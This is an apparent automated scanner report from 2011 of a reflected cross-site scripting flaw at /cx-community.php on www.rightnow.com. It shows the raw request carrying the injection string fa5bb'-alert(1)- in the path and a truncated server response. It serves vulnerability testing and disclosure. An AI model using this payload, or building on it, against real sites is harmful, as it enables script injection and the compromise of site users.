1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.rightnow.com |
Path: | /cx-community.php |
GET /cx-community.phpfa5bb'-alert(1)- Host: www.rightnow.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.rightnow.com Cookie: s_vi=[CS]v1|272F47EA |
HTTP/1.1 404 Not Found Date: Mon, 24 Oct 2011 16:26:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 38727 ... <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head>< ...[SNIP]... uery.get('http://www { c_id: existingRightNowContactID page_url: 'http://www.rightnow.com isPremium: '0', time: tsTimeStamp }); } if(includeOmniture != "no") { jQuery.ajaxSetup({async: false}); jQuery.ge ...[SNIP]... |